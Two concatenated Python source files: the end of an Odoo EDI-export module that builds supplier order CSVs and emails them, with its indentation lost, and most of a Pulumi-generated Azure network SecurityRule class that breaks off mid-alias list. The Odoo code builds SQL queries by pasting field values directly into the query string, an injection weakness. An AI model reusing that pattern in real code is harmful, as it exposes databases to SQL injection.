partners = self.env['res.partner'].search([('is_code','=',obj.code),('is_adr_code','=','0')])
for partner in partners:
partner_id=partner.id
obj.partner_id=partner_id
name = fields.Char("N° export", readonly=True)
code = fields.Char("Code fournisseur",required=True)
code_adr = fields.Char("Code adresse fournisseur")
partner_id = fields.Many2one('res.partner', 'Fournisseur', compute='_compute', readonly=True, store=True)
contact_id = fields.Many2one('res.partner', 'Contact Logistique')
date_fin = fields.Date("Date de fin", required=True)
historique_ids = fields.One2many('is.export.edi.histo' , 'edi_id', u"Historique")
@api.multi
def code_on_change(self,code):
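        # onchange handler: resolve the supplier partner from its code, then pre-fill its logistics contact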
cr , uid, context = self.env.args
res={}
res['value']={}
contact_id=False
if code:
partners = self.env['res.partner'].search([('is_code','=',code),('is_adr_code','=','0')])
for partner in partners:
partner_id=partner.id
            #** Look up the logistics contact ******************************
SQL="""
select rp.id, rp.is_type_contact, itc.name
from res_partner rp inner join is_type_contact itc on rp.is_type_contact=itc.id
where rp.parent_id="""+str(partner_id)+""" and itc.name ilike '%logistique%' and active='t' limit 1
"""
cr.execute(SQL)
result = cr.fetchall()
for row in result:
contact_id=row[0]
#***************************************************************
res['value']['contact_id']=contact_id
return res
@api.model
def create(self, vals):
data_obj = self.env['ir.model.data']
sequence_ids = data_obj.search([('name','=','is_export_edi_seq')])
if sequence_ids:
sequence_id = data_obj.browse(sequence_ids[0].id).res_id
vals['name'] = self.env['ir.sequence'].get_id(sequence_id, 'id')
obj = super(is_export_edi, self).create(vals)
return obj
@api.multi
def creer_fichier_edi_action(self):
cr , uid, context = self.env.args
for obj in self:
SQL="""
select
rp.is_code,
rp.is_adr_code,
f.name,
pt.is_code,
l.date,
l.type_cde,
(l.quantite-coalesce(l.quantite_rcp,0))*is_unit_coef(pt.uom_id, l.uom_id)
from is_cde_ouverte_fournisseur_line l inner join is_cde_ouverte_fournisseur_product p on l.product_id=p.id
inner join product_product pp on p.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
inner join is_cde_ouverte_fournisseur f on p.order_id=f.id
inner join res_partner rp on f.partner_id=rp.id
where rp.is_code='"""+obj.code+"""' and l.date<='"""+obj.date_fin+"""'
"""
if obj.code_adr:
SQL=SQL+" and rp.is_adr_code='"+obj.code_adr+"' "
SQL=SQL+"order by rp.is_code, rp.is_adr_code, pt.is_code, l.date "
cr.execute(SQL)
result = cr.fetchall()
datas="";
for row in result:
lig=row[0]+'\t'+row[1]+'\t'+row[2]+'\t'+row[3]+'\t'+str(row[4])+'\t'+row[5]+'\t'+str(row[6])+'\n'
datas=datas+lig
            #** Add the file as an attachment **********************************
name='export-edi-'+obj.name+'.csv'
attachment_obj = self.env['ir.attachment']
model=self._name
attachments = attachment_obj.search([('res_model','=',model),('res_id','=',obj.id),('name','=',name)]).unlink()
vals = {
'name': name,
'datas_fname': name,
'type': 'binary',
'file_type': 'text/csv',
'res_model': model,
'res_id': obj.id,
'datas': datas.encode('base64'),
}
attachment_obj.create(vals)
self.set_histo(obj.id, 'Création fichier EDI')
#*******************************************************************
@api.multi
def envoyer_par_mail_action(self):
for obj in self:
self.envoi_mail()
self.set_histo(obj.id, u"Envoie par mail du fichier d'EDI à "+obj.contact_id.email)
@api.multi
def set_histo(self, edi_id, description):
vals={
'edi_id' : edi_id,
'description': description,
}
histo=self.env['is.export.edi.histo'].create(vals)
@api.multi
def envoi_mail(self):
for obj in self:
email_to=obj.contact_id.email
if email_to==False:
raise Warning(u"Mail non renseigné pour ce contact !")
user = self.env['res.users'].browse(self._uid)
email = user.email
nom = user.name
if email==False:
raise Warning(u"Votre mail n'est pas renseigné !")
if email:
attachment_id = self.env['ir.attachment'].search([
('res_model','=','is.export.edi'),
('res_id' ,'=',obj.id),
])
body_html=u"""
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
</head>
<body>
<p>Bonjour, </p>
<p>Ci-joint le fichier d'EDI à traiter</p>
</body>
</html>
"""
email_vals={
'subject' : "[EDI] "+obj.name,
'email_to' : email_to,
'email_cc' : email,
'email_from' : email,
'body_html' : body_html.encode('utf-8'),
'attachment_ids': [(6, 0, [attachment_id.id])]
}
email_id=self.env['mail.mail'].create(email_vals)
self.env['mail.mail'].send(email_id)
class is_export_edi_histo(models.Model):
_name='is.export.edi.histo'
_order='name desc'
edi_id = fields.Many2one('is.export.edi', 'Export EDI', required=True, ondelete='cascade', readonly=True)
name = fields.Datetime("Date")
user_id = fields.Many2one('res.users', 'Utilisateur')
description = fields.Char("Opération éffectuée")
_defaults = {
'name' : lambda *a: fields.datetime.now(),
'user_id': lambda obj, cr, uid, context: uid,
}
| 38.070352
| 123
| 0.48614
|
794fd52e532728401e3e2805bb759c96d73361be
| 40,041
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200401/security_rule.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['SecurityRuleArgs', 'SecurityRule']
@pulumi.input_type
class SecurityRuleArgs:
def __init__(__self__, *,
access: pulumi.Input[Union[str, 'SecurityRuleAccess']],
direction: pulumi.Input[Union[str, 'SecurityRuleDirection']],
network_security_group_name: pulumi.Input[str],
protocol: pulumi.Input[Union[str, 'SecurityRuleProtocol']],
resource_group_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SecurityRule resource.
:param pulumi.Input[Union[str, 'SecurityRuleAccess']] access: The network traffic is allowed or denied.
        :param pulumi.Input[Union[str, 'SecurityRuleDirection']] direction: The direction of the rule. The direction specifies if the rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[Union[str, 'SecurityRuleProtocol']] protocol: Network protocol this rule applies to.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
pulumi.set(__self__, "access", access)
pulumi.set(__self__, "direction", direction)
pulumi.set(__self__, "network_security_group_name", network_security_group_name)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if destination_address_prefix is not None:
pulumi.set(__self__, "destination_address_prefix", destination_address_prefix)
if destination_address_prefixes is not None:
pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes)
if destination_application_security_groups is not None:
pulumi.set(__self__, "destination_application_security_groups", destination_application_security_groups)
if destination_port_range is not None:
pulumi.set(__self__, "destination_port_range", destination_port_range)
if destination_port_ranges is not None:
pulumi.set(__self__, "destination_port_ranges", destination_port_ranges)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if security_rule_name is not None:
pulumi.set(__self__, "security_rule_name", security_rule_name)
if source_address_prefix is not None:
pulumi.set(__self__, "source_address_prefix", source_address_prefix)
if source_address_prefixes is not None:
pulumi.set(__self__, "source_address_prefixes", source_address_prefixes)
if source_application_security_groups is not None:
pulumi.set(__self__, "source_application_security_groups", source_application_security_groups)
if source_port_range is not None:
pulumi.set(__self__, "source_port_range", source_port_range)
if source_port_ranges is not None:
pulumi.set(__self__, "source_port_ranges", source_port_ranges)
@property
@pulumi.getter
def access(self) -> pulumi.Input[Union[str, 'SecurityRuleAccess']]:
"""
The network traffic is allowed or denied.
"""
return pulumi.get(self, "access")
@access.setter
def access(self, value: pulumi.Input[Union[str, 'SecurityRuleAccess']]):
pulumi.set(self, "access", value)
@property
@pulumi.getter
def direction(self) -> pulumi.Input[Union[str, 'SecurityRuleDirection']]:
"""
        The direction of the rule. The direction specifies if the rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: pulumi.Input[Union[str, 'SecurityRuleDirection']]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter(name="networkSecurityGroupName")
def network_security_group_name(self) -> pulumi.Input[str]:
"""
The name of the network security group.
"""
return pulumi.get(self, "network_security_group_name")
@network_security_group_name.setter
def network_security_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "network_security_group_name", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[Union[str, 'SecurityRuleProtocol']]:
"""
Network protocol this rule applies to.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[Union[str, 'SecurityRuleProtocol']]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@destination_address_prefix.setter
def destination_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_address_prefix", value)
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@destination_address_prefixes.setter
def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "destination_address_prefixes", value)
@property
@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@destination_application_security_groups.setter
def destination_application_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]):
pulumi.set(self, "destination_application_security_groups", value)
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> Optional[pulumi.Input[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@destination_port_range.setter
def destination_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_port_range", value)
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@destination_port_ranges.setter
def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "destination_port_ranges", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="securityRuleName")
def security_rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security rule.
"""
return pulumi.get(self, "security_rule_name")
@security_rule_name.setter
def security_rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_rule_name", value)
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@source_address_prefix.setter
def source_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_address_prefix", value)
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@source_address_prefixes.setter
def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_address_prefixes", value)
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@source_application_security_groups.setter
def source_application_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationSecurityGroupArgs']]]]):
pulumi.set(self, "source_application_security_groups", value)
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> Optional[pulumi.Input[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@source_port_range.setter
def source_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_port_range", value)
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
@source_port_ranges.setter
def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_port_ranges", value)
class SecurityRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[Union[str, 'SecurityRuleAccess']]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[Union[str, 'SecurityRuleDirection']]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[Union[str, 'SecurityRuleProtocol']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Union[str, 'SecurityRuleAccess']] access: The network traffic is allowed or denied.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
        :param pulumi.Input[Union[str, 'SecurityRuleDirection']] direction: The direction of the rule. The direction specifies if the rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[Union[str, 'SecurityRuleProtocol']] protocol: Network protocol this rule applies to.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
:param pulumi.Input[str] source_address_prefix: The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: The CIDR or source IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] source_application_security_groups: The application security group specified as source.
:param pulumi.Input[str] source_port_range: The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: The source port ranges.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SecurityRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param SecurityRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SecurityRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[Union[str, 'SecurityRuleAccess']]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[Union[str, 'SecurityRuleDirection']]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[Union[str, 'SecurityRuleProtocol']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SecurityRuleArgs.__new__(SecurityRuleArgs)
if access is None and not opts.urn:
raise TypeError("Missing required property 'access'")
__props__.__dict__["access"] = access
__props__.__dict__["description"] = description
__props__.__dict__["destination_address_prefix"] = destination_address_prefix
__props__.__dict__["destination_address_prefixes"] = destination_address_prefixes
__props__.__dict__["destination_application_security_groups"] = destination_application_security_groups
__props__.__dict__["destination_port_range"] = destination_port_range
__props__.__dict__["destination_port_ranges"] = destination_port_ranges
if direction is None and not opts.urn:
raise TypeError("Missing required property 'direction'")
__props__.__dict__["direction"] = direction
__props__.__dict__["id"] = id
__props__.__dict__["name"] = name
if network_security_group_name is None and not opts.urn:
raise TypeError("Missing required property 'network_security_group_name'")
__props__.__dict__["network_security_group_name"] = network_security_group_name
__props__.__dict__["priority"] = priority
if protocol is None and not opts.urn:
raise TypeError("Missing required property 'protocol'")
__props__.__dict__["protocol"] = protocol
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rule_name"] = security_rule_name
__props__.__dict__["source_address_prefix"] = source_address_prefix
__props__.__dict__["source_address_prefixes"] = source_address_prefixes
__props__.__dict__["source_application_security_groups"] = source_application_security_groups
__props__.__dict__["source_port_range"] = source_port_range
__props__.__dict__["source_port_ranges"] = source_port_ranges
__props__.__dict__["etag"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200401:SecurityRule"), pulumi.Alias(type_="azure-native:network:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20150615:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160330:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20160901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20161201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170301:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20170901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171001:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20171101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180401:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20180801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181001:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20181201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190401:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190701:SecurityRule"), 
pulumi.Alias(type_="azure-nextgen:network/v20190701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20190901:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191101:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20191201:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200301:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200501:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200601:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200601:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200701:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20200701:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20200801:SecurityRule"), 